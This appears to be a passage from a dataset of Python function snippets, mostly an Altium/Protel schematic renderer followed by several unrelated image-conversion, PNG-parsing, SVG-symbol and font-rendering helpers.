colour(obj[\"COLOR\"])\n renderer.circle(2, location, fill=col)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"IOTYPE\", \"ALIGNMENT\"} == {\"RECORD\", \"OWNERPARTID\", \"STYLE\", \"WIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"AREACOLOR\", \"TEXTCOLOR\", \"NAME\", \"UNIQUEID\"} and\n obj[\"RECORD\"] == Record.PORT and obj[\"OWNERPARTID\"] == b\"-1\"):\n width = int(obj[\"WIDTH\"])\n if \"IOTYPE\" in obj:\n points = ((0, 0), (5, -5), (width - 5, -5),\n (width, 0), (width - 5, +5), (5, +5))\n else:\n points = ((0, -5), (width - 5, -5),\n (width, 0), (width - 5, +5), (0, +5))\n if (obj.get(\"ALIGNMENT\") == b\"2\") ^ (obj[\"STYLE\"] != b\"7\"):\n labelpoint = (10, 0)\n horiz = renderer.LEFT\n else:\n labelpoint = (width - 10, 0)\n horiz = renderer.RIGHT\n if obj[\"STYLE\"] == b\"7\":\n shapekw = dict(rotate=+90, offset=(0, +width))\n else:\n shapekw = dict()\n offset = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n with renderer.view(offset=offset) as view:\n view.polygon(points,\n width=0.6,\n outline=colour(obj[\"COLOR\"]),\n fill=colour(obj[\"AREACOLOR\"]),\n **shapekw)\n \n with contextlib.ExitStack() as context:\n if obj[\"STYLE\"] == b\"7\":\n view = context.enter_context(view.view(rotate=+1))\n view.text(\n overline(obj[\"NAME\"]),\n colour=colour(obj[\"TEXTCOLOR\"]),\n offset=labelpoint,\n vert=view.CENTRE, horiz=horiz,\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\"} >= {\"RECORD\", \"OWNERPARTID\", \"LINEWIDTH\", \"COLOR\", \"LOCATIONCOUNT\", \"X1\", \"Y1\", \"X2\", \"Y2\"} and\n obj[\"RECORD\"] == Record.WIRE and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"LINEWIDTH\"] == b\"1\"):\n points = list()\n for location in range(int(obj[\"LOCATIONCOUNT\"])):\n location = format(1 + location)\n points.append(tuple(int(obj[x + location]) for x in \"XY\"))\n renderer.polyline(points, colour=colour(obj[\"COLOR\"]))\n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\"} and\n obj[\"RECORD\"] in {b\"46\", b\"48\", b\"44\"} or\n obj.keys() - {\"USECOMPONENTLIBRARY\", \"DESCRIPTION\", \"DATAFILECOUNT\", \"MODELDATAFILEENTITY0\", \"MODELDATAFILEKIND0\", \"DATALINKSLOCKED\", \"DATABASEDATALINKSLOCKED\", \"ISCURRENT\", \"INDEXINSHEET\", \"INTEGRATEDMODEL\", \"DATABASEMODEL\"} == {\"RECORD\", \"OWNERINDEX\", \"MODELNAME\", \"MODELTYPE\"} and\n obj[\"RECORD\"] == b\"45\" and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj.get(\"USECOMPONENTLIBRARY\", b\"T\") == b\"T\" and obj[\"MODELTYPE\"] in {b\"PCBLIB\", b\"SI\", b\"SIM\", b\"PCB3DLib\"} and obj.get(\"DATAFILECOUNT\", b\"1\") == b\"1\" and obj.get(\"ISCURRENT\", b\"T\") == b\"T\" and obj.get(\"INTEGRATEDMODEL\", b\"T\") == b\"T\" and obj.get(\"DATABASEMODEL\", b\"T\") == b\"T\" and obj.get(\"DATALINKSLOCKED\", b\"T\") == b\"T\" and obj.get(\"DATABASEDATALINKSLOCKED\", b\"T\") == b\"T\" or\n obj.keys() >= {\"RECORD\", \"AREACOLOR\", \"BORDERON\", \"CUSTOMX\", \"CUSTOMY\", \"DISPLAY_UNIT\", \"FONTIDCOUNT\", \"FONTNAME1\", \"HOTSPOTGRIDON\", \"HOTSPOTGRIDSIZE\", \"ISBOC\", \"SHEETNUMBERSPACESIZE\", \"SIZE1\", \"SNAPGRIDON\", \"SNAPGRIDSIZE\", \"SYSTEMFONT\", \"USEMBCS\", \"VISIBLEGRIDON\", \"VISIBLEGRIDSIZE\"} and\n obj[\"RECORD\"] == Record.SHEET and obj[\"AREACOLOR\"] == b\"16317695\" and obj[\"BORDERON\"] == b\"T\" and obj.get(\"CUSTOMMARGINWIDTH\", b\"20\") == b\"20\" and obj.get(\"CUSTOMXZONES\", b\"6\") == b\"6\" and obj.get(\"CUSTOMYZONES\", b\"4\") == b\"4\" and obj[\"DISPLAY_UNIT\"] == b\"4\" and obj[\"FONTNAME1\"] == b\"Times New Roman\" and obj[\"HOTSPOTGRIDON\"] == b\"T\" and obj[\"ISBOC\"] == b\"T\" and obj[\"SHEETNUMBERSPACESIZE\"] == b\"4\" and obj[\"SIZE1\"] == b\"10\" and obj[\"SNAPGRIDON\"] == b\"T\" and obj[\"SYSTEMFONT\"] == b\"1\" and obj.get(\"TITLEBLOCKON\", b\"T\") == b\"T\" and obj[\"USEMBCS\"] == b\"T\" and obj[\"VISIBLEGRIDON\"] == b\"T\" and obj[\"VISIBLEGRIDSIZE\"] == b\"10\" or\n obj.keys() == {\"HEADER\", \"WEIGHT\"} and\n obj[\"HEADER\"] == b\"Protel for Windows - Schematic Capture Binary File Version 5.0\" or\n obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"DESIMP0\", \"DESIMPCOUNT\", \"DESINTF\", \"OWNERINDEX\"} and\n obj[\"RECORD\"] == b\"47\" and obj[\"DESIMPCOUNT\"] == b\"1\" or\n obj.keys() == {\"RECORD\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"FILENAME\"} and\n obj[\"RECORD\"] == b\"39\" and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n pass\n \n elif (obj.keys() - {\"ISMIRRORED\", \"ORIENTATION\", \"INDEXINSHEET\", \"COMPONENTDESCRIPTION\", \"SHEETPARTFILENAME\", \"DESIGNITEMID\", \"DISPLAYMODE\", \"NOTUSEDBTABLENAME\", \"LIBRARYPATH\"} == {\"RECORD\", \"OWNERPARTID\", \"UNIQUEID\", \"AREACOLOR\", \"COLOR\", \"CURRENTPARTID\", \"DISPLAYMODECOUNT\", \"LIBREFERENCE\", \"LOCATION.X\", \"LOCATION.Y\", \"PARTCOUNT\", \"PARTIDLOCKED\", \"SOURCELIBRARYNAME\", \"TARGETFILENAME\"} and\n obj[\"RECORD\"] == b\"1\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"AREACOLOR\"] == b\"11599871\" and obj[\"COLOR\"] == b\"128\" and obj[\"PARTIDLOCKED\"] == b\"F\" and obj[\"TARGETFILENAME\"] == b\"*\"):\n pass\n \n elif (obj.keys() - {\"TEXT\", \"OWNERINDEX\", \"ISHIDDEN\", \"READONLYSTATE\", \"INDEXINSHEET\", \"UNIQUEID\", \"LOCATION.X\", \"LOCATION.X_FRAC\", \"LOCATION.Y\", \"LOCATION.Y_FRAC\", \"ORIENTATION\", \"ISMIRRORED\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"FONTID\", \"NAME\"} and\n obj[\"RECORD\"] == Record.PARAMETER and obj[\"OWNERPARTID\"] == b\"-1\"):\n if obj.get(\"ISHIDDEN\") != b\"T\" and obj.keys() >= {\"TEXT\", \"LOCATION.X\", \"LOCATION.Y\"}:\n orient = obj.get(\"ORIENTATION\")\n kw = {\n None: dict(vert=renderer.BOTTOM, horiz=renderer.LEFT),\n b\"1\": dict(vert=renderer.BOTTOM, horiz=renderer.LEFT),\n b\"2\": dict(vert=renderer.TOP, horiz=renderer.RIGHT),\n }[orient]\n if orient == b\"1\":\n kw.update(angle=+90)\n val = obj[\"TEXT\"]\n if val.startswith(b\"=\"):\n match = val[1:].lower()\n for o in objects:\n if o.get(\"RECORD\") != Record.PARAMETER or o.get(\"OWNERINDEX\") != obj[\"OWNERINDEX\"]:\n continue\n if o[\"NAME\"].lower() != match:\n continue\n val = o[\"TEXT\"]\n break\n else:\n raise LookupError(\"Parameter value for |OWNERINDEX={}|TEXT={}\".format(obj[\"OWNERINDEX\"].decode(\"ascii\"), obj[\"TEXT\"].decode(\"ascii\")))\n renderer.text(val.decode(\"ascii\"),\n colour=colour(obj[\"COLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n **kw)\n else:\n text(renderer, obj, **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"ISMIRRORED\", \"LOCATION.X_FRAC\", \"LOCATION.Y_FRAC\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"FONTID\", \"TEXT\", \"NAME\", \"READONLYSTATE\"} and\n obj[\"RECORD\"] == Record.DESIGNATOR and obj[\"OWNERPARTID\"] == b\"-1\" and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"NAME\"] == b\"Designator\" and obj[\"READONLYSTATE\"] == b\"1\"):\n desig = obj[\"TEXT\"].decode(\"ascii\")\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if int(owner[\"PARTCOUNT\"]) > 2:\n desig += chr(ord(\"A\") + int(owner[\"CURRENTPARTID\"]) - 1)\n renderer.text(desig, (int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n colour=colour(obj[\"COLOR\"]),\n font=\"font\" + obj[\"FONTID\"].decode(),\n )\n \n elif (obj.keys() >= {\"RECORD\", \"OWNERPARTID\", \"OWNERINDEX\", \"LOCATIONCOUNT\", \"X1\", \"X2\", \"Y1\", \"Y2\"} and\n obj[\"RECORD\"] == Record.POLYLINE and obj.get(\"ISNOTACCESIBLE\", b\"T\") == b\"T\" and obj.get(\"LINEWIDTH\", b\"1\") == b\"1\"):\n if obj[\"OWNERPARTID\"] == b\"-1\":\n current = True\n else:\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n current = (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\"))\n if current:\n polyline(renderer, obj)\n \n elif (obj.keys() - {\"OWNERPARTDISPLAYMODE\", \"INDEXINSHEET\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"COLOR\", \"ISNOTACCESIBLE\", \"LINEWIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"CORNER.X\", \"CORNER.Y\"} and\n obj[\"RECORD\"] == Record.LINE and obj[\"ISNOTACCESIBLE\"] == b\"T\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\")):\n renderer.line(\n colour=colour(obj[\"COLOR\"]),\n width=int(obj[\"LINEWIDTH\"]),\n a=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n b=(int(obj[\"CORNER.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"NAME\", \"SWAPIDPIN\", \"OWNERPARTDISPLAYMODE\", \"ELECTRICAL\", \"DESCRIPTION\", \"SWAPIDPART\", \"SYMBOL_OUTEREDGE\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"DESIGNATOR\", \"FORMALTYPE\", \"LOCATION.X\", \"LOCATION.Y\", \"PINCONGLOMERATE\", \"PINLENGTH\"} and\n obj[\"RECORD\"] == Record.PIN and obj[\"FORMALTYPE\"] == b\"1\"):\n if obj[\"OWNERPARTID\"] == objects[1 + int(obj[\"OWNERINDEX\"])][\"CURRENTPARTID\"]:\n pinlength = int(obj[\"PINLENGTH\"])\n pinconglomerate = int(obj[\"PINCONGLOMERATE\"])\n offset = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n rotate = pinconglomerate & 3\n with renderer.view(offset=offset, rotate=rotate) as view:\n kw = dict()\n points = list()\n if \"SYMBOL_OUTEREDGE\" in obj:\n view.circle(2.85, (3.15, 0), width=0.6)\n points.append(6)\n points.append(pinlength)\n electrical = obj.get(\"ELECTRICAL\", PinElectrical.INPUT)\n marker = pinmarkers[electrical]\n if marker:\n kw.update(startarrow=marker)\n view.hline(*points, **kw)\n \n if pinconglomerate >> 1 & 1:\n invert = -1\n kw = dict(angle=180)\n else:\n invert = +1\n kw = dict()\n if pinconglomerate & 8 and \"NAME\" in obj:\n view.text(overline(obj[\"NAME\"]),\n vert=view.CENTRE,\n horiz=view.RIGHT * invert,\n offset=(-7, 0),\n **kw)\n if pinconglomerate & 16:\n designator = obj[\"DESIGNATOR\"].decode(\"ascii\")\n view.text(designator,\n horiz=view.LEFT * invert,\n offset=(+9, 0),\n **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"ORIENTATION\", \"STYLE\", \"ISCROSSSHEETCONNECTOR\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"LOCATION.X\", \"LOCATION.Y\", \"SHOWNETNAME\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.POWER_OBJECT and obj[\"OWNERPARTID\"] == b\"-1\"):\n orient = obj.get(\"ORIENTATION\")\n if obj.get(\"ISCROSSSHEETCONNECTOR\") == b\"T\":\n marker = dchevron\n offset = 14\n else:\n (marker, offset) = connmarkers.get(obj[\"STYLE\"], (None, 0))\n \n col = colour(obj[\"COLOR\"])\n translate = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n with renderer.view(colour=col, offset=translate) as view:\n kw = dict()\n if orient:\n kw.update(rotate=int(orient))\n view.draw(marker, **kw)\n \n if obj[\"SHOWNETNAME\"] != b\"F\":\n orients = {\n b\"2\": (renderer.RIGHT, renderer.CENTRE, (-1, 0)),\n b\"3\": (renderer.CENTRE, renderer.TOP, (0, -1)),\n None: (renderer.LEFT, renderer.CENTRE, (+1, 0)),\n b\"1\": (renderer.CENTRE, renderer.BOTTOM, (0, +1)),\n }\n (horiz, vert, pos) = orients[orient]\n t = obj[\"TEXT\"].decode(\"ascii\")\n pos = (p * offset for p in pos)\n view.text(t, pos, horiz=horiz, vert=vert)\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"OWNERPARTDISPLAYMODE\", \"ISSOLID\", \"LINEWIDTH\", \"CORNERXRADIUS\", \"CORNERYRADIUS\", \"TRANSPARENT\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"AREACOLOR\", \"COLOR\", \"CORNER.X\", \"CORNER.Y\", \"ISNOTACCESIBLE\", \"LOCATION.X\", \"LOCATION.Y\"} and\n obj[\"RECORD\"] in {Record.RECTANGLE, Record.ROUND_RECTANGLE} and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj.get(\"ISSOLID\", b\"T\") == b\"T\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (obj[\"OWNERPARTID\"] == owner[\"CURRENTPARTID\"] and\n obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\") == owner.get(\"DISPLAYMODE\", b\"0\")):\n kw = dict(width=0.6, outline=colour(obj[\"COLOR\"]))\n if \"ISSOLID\" in obj:\n kw.update(fill=colour(obj[\"AREACOLOR\"]))\n a = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n b = (int(obj[\"CORNER.\" + x]) for x in \"XY\")\n \n if obj[\"RECORD\"] == Record.ROUND_RECTANGLE:\n r = list()\n for x in \"XY\":\n radius = obj.get(\"CORNER{}RADIUS\".format(x))\n if radius is None:\n radius = 0\n else:\n radius = int(radius)\n r.append(int(radius))\n renderer.roundrect(r, a, b, **kw)\n else:\n renderer.rectangle(a, b, **kw)\n \n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERPARTID\", \"COLOR\", \"FONTID\", \"LOCATION.X\", \"LOCATION.Y\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.NET_LABEL and obj[\"OWNERPARTID\"] == b\"-1\"):\n renderer.text(overline(obj[\"TEXT\"]),\n colour=colour(obj[\"COLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"OWNERPARTDISPLAYMODE\", \"STARTANGLE\", \"SECONDARYRADIUS\"} == {\"RECORD\", \"OWNERPARTID\", \"OWNERINDEX\", \"COLOR\", \"ENDANGLE\", \"ISNOTACCESIBLE\", \"LINEWIDTH\", \"LOCATION.X\", \"LOCATION.Y\", \"RADIUS\"} and\n obj[\"RECORD\"] in {Record.ARC, Record.ELLIPTICAL_ARC} and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"LINEWIDTH\"] == b\"1\" and obj.get(\"OWNERPARTDISPLAYMODE\", b\"1\") == b\"1\"):\n owner = objects[1 + int(obj[\"OWNERINDEX\"])]\n if (owner[\"CURRENTPARTID\"] == obj[\"OWNERPARTID\"] and\n owner.get(\"DISPLAYMODE\", b\"0\") == obj.get(\"OWNERPARTDISPLAYMODE\", b\"0\")):\n r = int(obj[\"RADIUS\"])\n if obj[\"RECORD\"] == Record.ELLIPTICAL_ARC:\n r2 = obj.get(\"SECONDARYRADIUS\")\n if r2 is None:\n r2 = 0\n else:\n r2 = int(r2)\n else:\n r2 = r\n \n start = float(obj.get(\"STARTANGLE\", 0))\n end = float(obj[\"ENDANGLE\"])\n centre = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n renderer.arc((r, r2), start, end, centre,\n colour=colour(obj[\"COLOR\"]),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"LINEWIDTH\"} > {\"RECORD\", \"AREACOLOR\", \"COLOR\", \"ISNOTACCESIBLE\", \"ISSOLID\", \"LOCATIONCOUNT\", \"OWNERINDEX\", \"OWNERPARTID\"} and\n obj[\"RECORD\"] == Record.POLYGON and obj[\"AREACOLOR\"] == b\"16711680\" and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"ISSOLID\"] == b\"T\" and obj.get(\"LINEWIDTH\", b\"1\") == b\"1\" and obj[\"OWNERPARTID\"] == b\"1\"):\n points = list()\n for location in range(int(obj[\"LOCATIONCOUNT\"])):\n location = format(1 + location)\n points.append(tuple(int(obj[x + location]) for x in \"XY\"))\n renderer.polygon(fill=colour(obj[\"COLOR\"]), points=points)\n elif (obj.keys() - {\"INDEXINSHEET\", \"ISNOTACCESIBLE\", \"OWNERINDEX\", \"ORIENTATION\", \"JUSTIFICATION\", \"COLOR\"} == {\"RECORD\", \"FONTID\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\", \"TEXT\"} and\n obj[\"RECORD\"] == Record.LABEL):\n if obj[\"OWNERPARTID\"] == b\"-1\" or obj[\"OWNERPARTID\"] == objects[1 + int(obj[\"OWNERINDEX\"])][\"CURRENTPARTID\"]:\n text(renderer, obj)\n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"COLOR\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\"} and\n obj[\"RECORD\"] == b\"22\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n col = colour(obj[\"COLOR\"])\n location = (int(obj[\"LOCATION.\" + x]) for x in \"XY\")\n renderer.draw(nc, location, colour=col)\n elif (obj.keys() - {\"CLIPTORECT\"} == {\"RECORD\", \"ALIGNMENT\", \"AREACOLOR\", \"CORNER.X\", \"CORNER.Y\", \"FONTID\", \"ISSOLID\", \"LOCATION.X\", \"LOCATION.Y\", \"OWNERPARTID\", \"Text\", \"WORDWRAP\"} and\n obj[\"RECORD\"] == b\"28\" and obj[\"ALIGNMENT\"] == b\"1\" and obj[\"AREACOLOR\"] == b\"16777215\" and obj.get(\"CLIPTORECT\", b\"T\") == b\"T\" and obj[\"ISSOLID\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"WORDWRAP\"] == b\"T\"):\n lhs = int(obj[\"LOCATION.X\"])\n renderer.text(\n font=\"font\" + obj[\"FONTID\"].decode(\"ascii\"),\n offset=(lhs, int(obj[\"CORNER.Y\"])),\n width=int(obj[\"CORNER.X\"]) - lhs,\n text=obj[\"Text\"].decode(\"ascii\").replace(\"~1\", \"\\n\"),\n vert=renderer.TOP,\n )\n \n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"LINEWIDTH\", \"COLOR\", \"LOCATIONCOUNT\", \"X1\", \"Y1\", \"X2\", \"Y2\", \"X3\", \"Y3\", \"X4\", \"Y4\"} and\n obj[\"RECORD\"] == Record.BEZIER and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj[\"OWNERPARTID\"] == b\"1\" and obj[\"LINEWIDTH\"] == b\"1\" and obj[\"LOCATIONCOUNT\"] == b\"4\"):\n col = colour(obj[\"COLOR\"])\n points = list()\n for n in range(4):\n n = format(1 + n)\n points.append(tuple(int(obj[x + n]) for x in \"XY\"))\n renderer.cubicbezier(*points, colour=col)\n \n elif (obj.keys() - {\"RADIUS_FRAC\", \"SECONDARYRADIUS_FRAC\"} == {\"RECORD\", \"OWNERINDEX\", \"ISNOTACCESIBLE\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"RADIUS\", \"SECONDARYRADIUS\", \"COLOR\", \"AREACOLOR\", \"ISSOLID\"} and\n obj[\"RECORD\"] == Record.ELLIPSE and obj[\"ISNOTACCESIBLE\"] == b\"T\" and obj.get(\"RADIUS_FRAC\", b\"94381\") == b\"94381\" and obj[\"SECONDARYRADIUS\"] == obj[\"RADIUS\"] and obj.get(\"SECONDARYRADIUS_FRAC\", b\"22993\") == b\"22993\" and obj[\"ISSOLID\"] == b\"T\"):\n renderer.circle(\n r=int(obj[\"RADIUS\"]),\n width=0.6,\n outline=colour(obj[\"COLOR\"]), fill=colour(obj[\"AREACOLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\", \"SYMBOLTYPE\"} == {\"RECORD\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"XSIZE\", \"YSIZE\", \"COLOR\", \"AREACOLOR\", \"ISSOLID\", \"UNIQUEID\"} and\n obj[\"RECORD\"] == Record.SHEET_SYMBOL and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"ISSOLID\"] == b\"T\" and obj.get(\"SYMBOLTYPE\", b\"Normal\") == b\"Normal\"):\n renderer.rectangle((int(obj[\"XSIZE\"]), -int(obj[\"YSIZE\"])),\n width=0.6,\n outline=colour(obj[\"COLOR\"]), fill=colour(obj[\"AREACOLOR\"]),\n offset=(int(obj[\"LOCATION.\" + x]) for x in \"XY\"),\n )\n \n elif (obj.keys() - {\"INDEXINSHEET\"} == {\"RECORD\", \"OWNERINDEX\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"COLOR\", \"FONTID\", \"TEXT\"} and\n obj[\"RECORD\"] in {Record.SHEET_NAME, Record.SHEET_FILE_NAME} and obj.get(\"INDEXINSHEET\", b\"-1\") == b\"-1\" and obj[\"OWNERPARTID\"] == b\"-1\"):\n text(renderer, obj)\n \n elif (obj.keys() == {\"RECORD\", \"OWNERINDEX\", \"INDEXINSHEET\", \"OWNERPARTID\", \"LOCATION.X\", \"LOCATION.Y\", \"CORNER.X\", \"CORNER.Y\", \"EMBEDIMAGE\", \"FILENAME\"} and\n obj[\"RECORD\"] == Record.IMAGE and obj[\"OWNERINDEX\"] == b\"1\" and obj[\"OWNERPARTID\"] == b\"-1\" and obj[\"EMBEDIMAGE\"] == b\"T\" and obj[\"FILENAME\"] == b\"newAltmLogo.bmp\"):\n location = list()\n corner = list()\n for x in \"XY\":\n location.append(int(obj[\"LOCATION.\" + x]))\n corner.append(int(obj[\"CORNER.\" + x]))\n renderer.rectangle(location, corner, width=0.6)\n \n else:\n print(\"\".join(\"|{}={!r}\".format(p, v) for (p, v) in sorted(obj.items())), file=stderr)\n \n renderer.finish()", "def perform_symbolization(self): # pragma: no cover\n # pylint: disable=redefined-variable-type\n if os.path.isfile(self.start_location):\n files = [self.start_location]\n else:\n files = self._get_files()\n\n for filename in files:\n print(\"Processing file -- {0}\".format(filename))\n updated_file_text = ''\n updated_file_text = ''\n with open(filename, 'r') as fin:\n for line in fin.readlines():\n new_line = self.replace_id_with_symbol(line)\n\n if not updated_file_text and new_line:\n updated_file_text = new_line\n elif new_line:\n updated_file_text += new_line\n\n with open(filename, 'w') as fout:\n fout.write(updated_file_text)", "def _add_png(self, pngfile):\n with open(pngfile, 'rb') as png:\n if png.read(8) != self.magic:\n raise ValueError(\"{} is not a PNG file\".format(pngfile))\n while True:\n chead = png.read(8)\n if len(chead) == 0:\n break\n clen, ctype = struct.unpack(\">L4s\", chead)\n cdata = png.read(clen)\n ccrc = png.read(4)\n utype = ctype.decode(\"ascii\")\n self._current_chunk = (chead[:4], ctype, cdata, ccrc)\n if ctype in self.mustmatch:\n ref = self._matchref.get(ctype)\n if ref is None:\n self._matchref[ctype] = cdata\n self._copy()\n else:\n if cdata != ref:\n raise ValueError(\"Chunk {} mismatch\".format(utype))\n met = (\"_first_\" if self._first else \"_next_\") + utype\n try:\n met = getattr(self, met)\n except AttributeError:\n pass\n else:\n met(cdata)\n self._first = False", "def run(self):\n generated_gif = self.generate()\n with open(self.out_filename, 'wb') as out_fd:\n out_fd.write(generated_gif)", "def run_turtle_program(source):\n ast = parser.parse(source)\n\n t = turtle.Turtle()\n for stmt in ast.statement:\n do_statement(stmt, t)\n canvas = turtle.Screen().getcanvas()\n canvas.postscript(file='image.eps')\n img = Image.open('image.eps')\n img.save('image.png', 'png')\n turtle.Screen().bye()\n return 'image.png'", "def gen_symbols(path, strip):\n\n symbols = ''\n svg_namespace = 'http://www.w3.org/2000/svg'\n etree.register_namespace('', svg_namespace)\n\n for root, dirs, files in os.walk(os.path.abspath(path)):\n for wwsfile in files:\n basename, extension = os.path.splitext(wwsfile)\n if extension == '.svg':\n filepath = os.path.join(root, wwsfile)\n try:\n svg = etree.parse(filepath)\n svg_root = svg.getroot()\n\n attribs = svg_root.attrib\n desc = svg.find('{'+svg_namespace+'}desc')\n svg_root.remove(desc)\n title = svg.find('{'+svg_namespace+'}title')\n svg_root.remove(title)\n metadata = svg.find('{'+svg_namespace+'}metadata')\n svg_root.remove(metadata)\n\n viewbox_attrib = 'viewBox'\n if viewbox_attrib in attribs:\n viewbox = attribs[viewbox_attrib]\n else:\n viewbox = f\"0 0 {attribs['width']} {attribs['height']}\"\n\n basename2 = basename.replace(strip, '')\n symbols += f'<symbol id=\"{basename2}\" viewBox=\"{viewbox}\">'\n\n for element in svg_root:\n symbols += etree.tostring(element).decode('utf-8')\n symbols += '</symbol>'\n\n except Exception as err:\n warnings.warn(f'Could not parse file {filepath}: {err}')\n\n return symbols", "def AA2Image(readpath, savepath, header, font_data):\n if not os.path.isdir(savepath):\n os.makedirs(savepath)\n print('convert txt to png. save path: ', savepath)\n\n files = glob.glob(readpath+'*.txt')\n\n for file in files:\n ascii_art = AsciiArt(file)\n ascii_art_image = ascii_art.image(font_data)\n filename = header + os.path.basename(file)[:-4] + '.png'\n ascii_art_image = Image.fromarray(ascii_art_image)\n ascii_art_image = ascii_art_image.convert('L')\n ascii_art_image.save(savepath + filename)\n print('saved ', filename)", "def main():\n argvs = sys.argv\n argc = len(argvs)\n if argc == 1:\n print('usage: convert2png.py <path/to/*.ppm> ...')\n sys.exit(1)\n\n os.makedirs('result/convert2png', exist_ok=True)\n\n for i in range(1, argc):\n img = cv2.imread(argvs[i])\n\n # root, ext = os.path.splitext(argvs[i])\n # cv2.imwrite(root + '.png', img)\n\n root, ext = os.path.splitext(argvs[i])\n strImgName = root.split('/')[-1]\n cv2.imwrite('result/convert2png/' + strImgName + '.png', img)", "def postprocess_file(config: Config, dfs: DFs) -> None:\n if SymbolDF.name in dfs:\n dfs[SymbolDF.name] = postprocess_symbols(config, dfs[SymbolDF.name])", "def get_carbon_image(fName):\r\n\r\n print(f'On File {fName}')\r\n\r\n global driver\r\n with open(fName) as f:\r\n code = f.read()\r\n\r\n code = urllib.parse.quote_plus(code)\r\n url = CARBON.format(code=code)\r\n\r\n\r\n driver.get(url)\r\n\r\n driver.find_element_by_xpath(\"//button[contains(text(),'Export')]\").click()\r\n driver.find_element_by_xpath(\"//button[contains(text(),'Open')]\").click()\r\n sleep(5) # this might take a bit\r\n driver.save_screenshot(fName.strip('.py')+'.png')\r\n print(f\"{fName.strip('.py')+'.png'} saved.\")\r\n return True", "def new_func():\n dirname, _ = os.path.split(os.path.abspath(__file__))\n pngfile = os.path.sep.join([dirname, \"out.png\"])\n img = [\"110010010011\", \"101011010100\", \"110010110101\", \"100010010011\"]\n img = [[int(val) for val in value] for value in img]\n writer = png.Writer(len(img[0]), len(img), greyscale=True, bitdepth=16)\n with open(pngfile, \"wb\") as file:\n writer.write(file, img)\n try:\n func(pngfile)\n finally:\n os.remove(pngfile)", "def process(image):\n pass", "def main():\n\n import codecs\n\n file_path = '../sample_texts/hi-Deva.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 'hindi.png',\n family='Noto Sans Devanagari', language='hi', rtl=False)\n\n file_path = '../sample_texts/ar-Arab.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 'arabic.png',\n family='Noto Naskh Arabic', language='ar', rtl=True)\n\n file_path = '../sample_texts/mn-Mong.txt'\n with codecs.open(file_path, 'r', encoding='UTF-8') as input_file:\n sample_text = input_file.read()\n create_png(sample_text.strip(), 